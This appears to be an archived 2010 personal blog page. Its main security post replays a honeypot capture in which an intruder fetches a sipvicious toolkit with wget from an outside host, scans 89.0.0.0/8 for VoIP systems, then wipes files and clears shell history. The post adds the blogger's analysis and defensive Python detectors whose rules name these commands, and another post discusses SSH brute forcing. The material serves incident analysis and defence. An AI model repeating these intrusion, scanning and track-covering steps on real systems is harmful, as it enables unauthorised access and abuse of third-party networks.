Plagiarism is just plain wrong! Copyright protections were developed to protect writers and their livelihoods. Stealing someone else's article in whole or in part is a form of theft. A while back, Peter Coates at Australia by the Indian Ocean had a blog posting plagiarized. Now, Gonzalo Lira had a recent post plagiarized by Cumberland Advisors. It doesn't matter whether the theft was large or small, it's wrong and unethical! I'm not condemning someone for lifting a sentence and using that in their blog or email. I am admonishing people for lifting whole paragraphs if not whole articles. It's not that difficult to give an attribution to the author or source when you reference someone else's writing and credit should be given where credit is due. We are not China yet! If you want to plagiarize, move to China where copyrights mean little.



Friday, October 15, 2010

This World is as Tenuous as a Dream

The world is unstable, like a house on fire. This is not a place where you stay long. The murderous haunt of impermanence comes upon you in a flash, no matter whether you are rich or poor, old or young. If you want to be no different from a Zen master or a buddha, just do not seek outwardly.

- Lin Chi (d. 867)


"The natural selection of phenotypes cannot in itself produce cumulative change, because phenotypes are extremely temporary manifestations...Socrates...may have been very successful in the evolutionary sense of leaving numerous offspring. His phenotype, nevertheless, was utterly destroyed by the hemlock and has never since been duplicated...The same argument also holds for genotypes. With Socrates' death, not only did his phenotype disappear but also his genotype...because meiosis and recombination destroy genotypes as surely as death...It is only the meiotically dissociated fragments of the genotype that are transmitted in sexual reproduction, and these fragments are further fragmented by meiosis in the next generation. If there is an ultimate indivisible fragment it is, by definition, ‘the gene’ that is treated in the abstract discussions of population genetics."

George C. Williams (1926-2010)



Tuesday, October 12, 2010

Barry Ritholtz Interview on The Keiser Report

video

Barry Ritholtz's blog, The Big Picture, is an informative blog from the perspective of a Wall Street money manager. The whole show is here.



Saturday, October 09, 2010

More Information on Sipvicious Attacks

I have more information on the sipvicious attacks. A monitored system was successfully attacked today. Unfortunately, the connection was lost. Something caused the WAN interface on my DSL router to fail. The attacker had a Romanian IP address, 89.42.192.73, which is likely a dynamically assigned IP address because a reverse lookup gives 73.192.42.89.in-addr.arpa domain name pointer 73-192-42-89.uen.ro.

The breach occurred around timestamp 2010-10-09 19:11:43 in my logs.

Here's a replay of the actions of the attacker:

sales:~# w
19:11:47 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 89.42.192.73 19:11 0.00s 0.00s 0.00s w
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# cd /var/tmp/
sales:/var/tmp# ls
sales:/var/tmp# yum -y install gcc sendmail screen
bash: yum: command not found
sales:/var/tmp# apt-get install gcc sendmail screen
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
gcc screen sendmail
0 upgraded, 3 newly installed, 0 to remove and 259 not upgraded.
Need to get 1302.2kB of archives.
After this operation, 2864.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main gcc 1.10-5 [352.2kB]
Get:2 http://ftp.debian.org stable/main screen 0.23-5 [179.2kB]
Get:3 http://ftp.debian.org stable/main sendmail 0.11-1 [771.2kB]
Fetched 1302.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking gcc (from .../archives/gcc_1.10-5_i386.deb) ...
Unpacking screen (from .../archives/screen_0.23-5_i386.deb) ...
Unpacking sendmail (from .../archives/sendmail_0.11-1_i386.deb) ...
Processing triggers for man-db ...
Setting up gcc (1.10-5) ...
Setting up screen (0.23-5) ...
Setting up sendmail (0.11-1) ...
sales:/var/tmp# mkdir :">..
sales:/var/tmp# mkdir "..."
sales:/var/tmp# cd "..."
sales:/var/tmp/...# wget http://wed2010.ucoz.com/sip.tgz
--2010-10-09 19:16:19-- http://wed2010.ucoz.com/sip.tgz
Connecting to wed2010.ucoz.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 388072 (378K) [application/octet-stream]
Saving to: `sip.tgz

100%[======================================>] 388,072 255K/s eta 0s

2010-10-09 19:16:20 (255 KB/s) - `sip.tgz' saved [388072/388072]
sales:/var/tmp/...# tar zxvf s
tar: s: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sales:/var/tmp/...# locatre
sales:/var/tmp/...# locate sip.conf
bash: locate: command not found
sales:/var/tmp/...# apt-get install locate
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
locate
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 542.2kB of archives.
After this operation, 1192.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main locate 1.37-9 [542.2kB]
Fetched 542.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking locate (from .../archives/locate_1.37-9_i386.deb) ...
Processing triggers for man-db ...
Setting up locate (1.37-9) ...
sales:/var/tmp/...# locate sip.conf
locate: Segmentation fault
sales:/var/tmp/...# ls
sip.tgz
sales:/var/tmp/...# tar zxvf sip.tgz
sip
sip/useri
sip/totag
sip/TODO
sip/THANKS
sip/svwar.py
sip/svreport.py
sip/svmap.py
sip/svlearnfp.py
sip/svcrack.py
sip/sv.xsl
sip/staticheaders
sip/staticfull
sip/regen.pyc
sip/regen.py
sip/README
sip/pptable.pyc
sip/pptable.py
sip/parole
sip/helper.pyc
sip/helper.py
sip/HELP
sip/groupdb
sip/go
sip/fphelper.pyc
sip/fphelper.py
sip/Changelog
sip/.svn
sip/.svn/tmp
sip/.svn/tmp/text-base
sip/.svn/tmp/props
sip/.svn/tmp/prop-base
sip/.svn/text-base
sip/.svn/text-base/totag.svn-base
sip/.svn/text-base/TODO.svn-base
sip/.svn/text-base/THANKS.svn-base
sip/.svn/text-base/svwar.py.svn-base
sip/.svn/text-base/svreport.py.svn-base
sip/.svn/text-base/svmap.py.svn-base
sip/.svn/text-base/svlearnfp.py.svn-base
sip/.svn/text-base/svcrack.py.svn-base
sip/.svn/text-base/sv.xsl.svn-base
sip/.svn/text-base/staticheaders.svn-base
sip/.svn/text-base/staticfull.svn-base
sip/.svn/text-base/regen.py.svn-base
sip/.svn/text-base/README.svn-base
sip/.svn/text-base/pptable.py.svn-base
sip/.svn/text-base/helper.py.svn-base
sip/.svn/text-base/groupdb.svn-base
sip/.svn/text-base/fphelper.py.svn-base
sip/.svn/text-base/Changelog.svn-base
sip/.svn/props
sip/.svn/prop-base
sip/.svn/prop-base/totag.svn-base
sip/.svn/prop-base/svwar.py.svn-base
sip/.svn/prop-base/svreport.py.svn-base
sip/.svn/prop-base/svmap.py.svn-base
sip/.svn/prop-base/svlearnfp.py.svn-base
sip/.svn/prop-base/svcrack.py.svn-base
sip/.svn/prop-base/staticheaders.svn-base
sip/.svn/prop-base/staticfull.svn-base
sip/.svn/prop-base/groupdb.svn-base
sip/.svn/format
sip/.svn/entries
sip/.svn/all-wcprops
sales:/var/tmp/...# cd sip
sales:/var/tmp/.../sip# chmod 777 *
sales:/var/tmp/.../sip# chmod +x *
sales:/var/tmp/.../sip# ./svmap.py --randomize 89.0.0.0/8
___
{o,o}
|)__)
-"-"-
O RLY? yes
___
{o,o}
(__(|
-"-"-
NO WAI!
sales:/var/tmp/.../sip# cd ..
sales:/var/tmp/...# ls
sip.tgz sip
sales:/var/tmp/...# rm -rf *
sales:/var/tmp/...# w
sales:/var/tmp/...#
sales:/var/tmp/...#
sales:/var/tmp/...# history -c4
1 w
2 uname -a
3 cat /etc/issue
4 cat /proc/cpuinfo
5 cd /var/tmp/
6 ls
7 yum -y install gcc sendmail screen
8 apt-get install gcc sendmail screen
9 mkdir "..."
10 cd "..."
11 wget http://wed2010.ucoz.com/sip.tgz
12 tar zxvf s
13 locate sip.conf
14 apt-get install locate
15 locate sip.conf
16 ls
17 tar zxvf sip.tgz
18 cd sip
19 chmod 777 *
20 chmod +x *
21 ./svmap.py --randomize 89.0.0.0/8
22 cd ..
23 ls
24 rm -rf *
25 history -c4
sales:/var/tmp/...# history -c

The first thing the attacker does after getting oriented is to install screen and sendmail. Screen is a terminal multiplexer: it lets one terminal host several sessions and keeps them alive if the remote connection drops, so a disconnect doesn't cost the attacker his session. Sendmail is installed most likely because the attacker wants to set up an open mail relay and/or communicate by email; having tools email their results is easy to script.

The attacker then goes to http://wed2010.ucoz.com, downloads sip.tgz with wget and unpacks it. He looks for a sip.conf file, which does not exist, and then starts svmap.py, a sipvicious scanning script written in Python. What is odd is that the attacker randomly scans the address space he is coming from: the target of ./svmap.py --randomize 89.0.0.0/8 contains his own address, 89.42.192.73. This suggests that the attacker is either making an internal attack on his ISP look like an external attack from the U.S., or has compromised a Romanian system and wants to expand his range on that network without risking his toehold. A third possibility is a functionality test: the attacker has already scanned that network, has a list of VOIP systems, and wants to check his VOIP scanner against that list to make sure it works and is not being filtered.
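The behaviours described in the last two paragraphs are easy to turn into a detection over a captured session. The following is an added example written for this post, not code from the original capture or from the sipvicious project: it parses a prompt/command transcript (constructed below from the commands in the capture above, with output lines omitted), flags the indicators seen here (tool installs, a dot-named hiding directory under /var/tmp, a fetched tarball, chmod 777, a scanner launch, rm -rf and history clearing), and checks whether the range handed to svmap.py contains the attacker's own source address. The rule names, regexes and the three-indicator threshold are my own assumptions.

```python
"""Flag post-compromise indicators in a captured shell session.

Added example, not part of the original post. The transcript below is
constructed from the commands in the honeypot capture (output omitted);
the indicator rules and threshold are assumptions, not a published standard.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed transcript: prompt + command lines only.
SESSION = """\
sales:~# w
sales:~# uname -a
sales:~# cd /var/tmp/
sales:/var/tmp# apt-get install gcc sendmail screen
sales:/var/tmp# mkdir "..."
sales:/var/tmp# cd "..."
sales:/var/tmp/...# wget http://wed2010.ucoz.com/sip.tgz
sales:/var/tmp/...# tar zxvf sip.tgz
sales:/var/tmp/...# cd sip
sales:/var/tmp/.../sip# chmod 777 *
sales:/var/tmp/.../sip# ./svmap.py --randomize 89.0.0.0/8
sales:/var/tmp/.../sip# cd ..
sales:/var/tmp/...# rm -rf *
sales:/var/tmp/...# history -c
"""

# "host:cwd# command" as printed by a root bash prompt.
PROMPT_RE = re.compile(r"^(?P<host>[\w.-]+):(?P<cwd>\S*)# (?P<cmd>.+)$")

# (indicator name, pattern applied to the command part of a prompt line)
RULES = [
    ("tooling-install", re.compile(r"^(apt-get|yum)\s+(-y\s+)?install\b.*\b(gcc|screen|sendmail)\b")),
    ("hidden-dir", re.compile(r'^mkdir\s+"?\.{2,}"?$')),          # mkdir "..." style hiding
    ("remote-archive-fetch", re.compile(r"^(wget|curl)\s+\S+\.(tgz|tar\.gz|zip)\b")),
    ("world-writable-chmod", re.compile(r"^chmod\s+777\b")),
    ("scanner-launch", re.compile(r"^\./sv(map|war|crack)\.py\b")),  # sipvicious entry points
    ("wipe-workdir", re.compile(r"^rm\s+-rf\s+\*")),
    ("history-clear", re.compile(r"^history\s+-c\b")),
]


def parse_session(text):
    """Return (cwd, command) pairs for every prompt line; output lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = PROMPT_RE.match(line)
        if m:
            entries.append((m.group("cwd"), m.group("cmd")))
    return entries


def find_indicators(text):
    """Map indicator name -> list of the commands that triggered it."""
    hits = defaultdict(list)
    for cwd, cmd in parse_session(text):
        for name, rx in RULES:
            if rx.search(cmd):
                hits[name].append(cmd)
        if cwd.startswith("/var/tmp"):          # any work staged in /var/tmp is worth noting
            hits["var-tmp-activity"].append(cmd)
    return dict(hits)


def verdict(hits, min_categories=3):
    """Assumed scoring rule: three or more distinct strong indicators = probable compromise."""
    strong = [k for k in hits if k != "var-tmp-activity"]
    return "probable compromise" if len(strong) >= min_categories else "inconclusive"


def scan_targets_include_source(text, source_ip):
    """True if any range passed to svmap.py contains the attacker's own source address."""
    src = ipaddress.ip_address(source_ip)
    for _, cmd in parse_session(text):
        if not cmd.startswith("./svmap.py"):
            continue
        for token in cmd.split()[1:]:
            if token.startswith("-"):
                continue
            try:
                net = ipaddress.ip_network(token, strict=False)
            except ValueError:
                continue
            if src in net:
                return True
    return False


if __name__ == "__main__":
    found = find_indicators(SESSION)
    for name, cmds in sorted(found.items()):
        print(f"{name:22s} {len(cmds)} hit(s): {cmds[0]}")
    print("verdict:", verdict(found))
    print("scans own network:", scan_targets_include_source(SESSION, "89.42.192.73"))
```

The rule list is deliberately narrow; on a real honeypot the same parser would be fed the full session log and the rules extended with whatever staging behaviour the captures keep showing.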

Team Cymru has a post from September 3rd about the new phreaks using sipvicious to find and attack VOIP PBX systems. Unfortunately, since my router hosed and the connection was lost, the attacker most likely did not finish configuring sipvicious or sendmail and could not reconnect to finish the session. The toolkit I recovered carries the following timestamp:

Sep 3 16:41 .svn

which coincides with a spike in port 5060 traffic for September 3, 2010 according to the SANS ISC 5060 Port Report.

September 2010 port 5060 traffic
It may just be a coincidence, signifying only that the attackers are using a fairly recent development version of sipvicious, since I can't find any custom modifications to the code.



Tuesday, October 05, 2010

Dominant Classes Derive From Surviving Mass Extinction Events

A new discovery of dinosaur footprints 2 million years after the Permian extinction event suggests that dinosaurs rose to ascendancy because they were the majority of survivors. In other words, the Permian mass extinction led directly to the success of the dinosaurs until they were wiped out in another mass extinction 160 million or more years later. As pointed out in the article, the later mass extinction at the end of the Cretaceous allowed mammals to evolve and spread throughout the planet. As we enter this third planetary mass extinction event, will humans just be the cause of the extinction of 95% of life on the planet, including ourselves? Are we setting the stage for something else to replace us just like we replaced the dinosaurs? The difference this time will be that a species caused the mass extinction rather than some external environmental event like volcanoes or asteroid impacts.



Gonzalo Lira Interview on The Keiser Report

Gonzalo Lira was interviewed on The Keiser Report. The full interview is below.

video

The entire show is here.



Sunday, October 03, 2010

The State of IT Security

The state of IT security is rather dismal. Attacks on vulnerable services that worked 10 years ago still work today, despite the fact that operating systems have been hardened and firewalls and intrusion detection and prevention systems (IDS/IPS) are in place. What really makes me mad, though, is the lack of available information. I purchased a book called Network Security Assessment. While it's a useful reference to have, it is obsolete and incomplete in sections. How do I know this? I have been running honeypots. I discovered that the malicious elements are using a tool called UnixCod to brute force SSH connections. I have only found one review of this "password auditing tool". To say that it is a password auditing tool is being generous. UnixCod, which has been around since 2005, is a fast network scanner that finds systems running the SSH service and tries to exploit them with a brute force dictionary attack of common usernames and passwords. You'd think a book written in 2008 would mention such a tool, but it doesn't. In fact, this tool can scan 64,516 hosts in 9 minutes flat and then attack only the ones running SSH. Maybe this is a slow tool by state-of-the-art standards, but I was impressed. This highlights a growing problem with IT security in general: the lack of distributed knowledge bases. The people who are supposed to protect the networks are months, if not years, behind in knowing what the people attacking them are up to. There is not enough knowledge sharing within the community, and it only hurts the defenders. To add insult to injury, why does my ISP allow brute force SSH and VOIP attacks on my systems from overseas? Obviously my ISP doesn't care if I get hacked and lose money, but my bank might.
It would be rather trivial to drop packets from overseas IP addresses that are being malicious and running such tools in order to protect one's customers; that is what IDS/IPS systems are designed to do. I guess the major ISPs, with the exception of Comcast, just don't care.
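The brute-force behaviour described above leaves a very recognisable trail in sshd's own log, which is where a defender without an ISP's help can still catch it. As an added example (not from the post, and unrelated to UnixCod's code), here is a Python detector that counts failed password attempts per source within a sliding time window and also flags the event the honeypot capture in the previous post actually recorded: a successful login from a source that had just been failing. The log lines are constructed in the Debian syslog format sshd writes (89.42.192.73 is the address from the capture above; 203.0.113.7 and 192.0.2.10 are documentation addresses), the year is assumed because syslog omits it, and the thresholds are assumptions.

```python
"""Detect SSH brute-force sources and a success-after-failures login.

Added example, not part of the original post. Log lines are constructed;
thresholds (5 failures in 60 s, success after 3 or more failures) are assumed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log excerpt in Debian syslog format.
LOG = """\
Oct  9 19:10:01 sales sshd[5660]: Failed password for root from 89.42.192.73 port 40122 ssh2
Oct  9 19:10:03 sales sshd[5661]: Failed password for root from 89.42.192.73 port 40123 ssh2
Oct  9 19:10:05 sales sshd[5662]: Failed password for invalid user admin from 89.42.192.73 port 40124 ssh2
Oct  9 19:10:07 sales sshd[5663]: Failed password for root from 89.42.192.73 port 40125 ssh2
Oct  9 19:10:09 sales sshd[5664]: Failed password for root from 89.42.192.73 port 40126 ssh2
Oct  9 19:11:43 sales sshd[5670]: Accepted password for root from 89.42.192.73 port 40130 ssh2
Oct  9 19:12:00 sales sshd[5680]: Failed password for root from 203.0.113.7 port 51000 ssh2
Oct  9 19:30:00 sales sshd[5690]: Accepted publickey for admin from 192.0.2.10 port 52000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
LOG_YEAR = 2010  # syslog lines carry no year; assumed from the post's date


def parse_events(text):
    """Turn sshd auth lines into dicts with a real timestamp; unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{LOG_YEAR} {m['mon']} {m['day']} {m['time']}",
                               "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "ok": m["result"] == "Accepted",
                       "method": m["method"], "user": m["user"], "ip": m["ip"]})
    return events


def brute_force_sources(events, threshold=5, window=60):
    """Sources with >= threshold failed logins inside any window of `window` seconds."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()
    for ev in events:
        if ev["ok"]:
            continue
        q = recent[ev["ip"]]
        q.append(ev["time"])
        while (ev["time"] - q[0]).total_seconds() > window:
            q.popleft()               # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged.add(ev["ip"])
    return flagged


def successes_after_failures(events, min_failures=3):
    """(ip, user, time) for each accepted login preceded by >= min_failures failures
    from the same source: the signature of a dictionary attack that worked."""
    failures = defaultdict(int)
    hits = []
    for ev in events:
        if ev["ok"]:
            if failures[ev["ip"]] >= min_failures:
                hits.append((ev["ip"], ev["user"], ev["time"]))
            failures[ev["ip"]] = 0    # a success resets the streak for that source
        else:
            failures[ev["ip"]] += 1
    return hits


if __name__ == "__main__":
    evs = parse_events(LOG)
    print("brute-force sources:", sorted(brute_force_sources(evs)))
    for ip, user, when in successes_after_failures(evs):
        print(f"ALERT {when}: {user} logged in from {ip} after repeated failures")
```

The second check matters more than the first: a flood of failures is routine noise on any Internet-facing sshd, but a success from a source that was just failing is exactly the event worth paging on, and it is the one the honeypot saw at 19:11:43.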


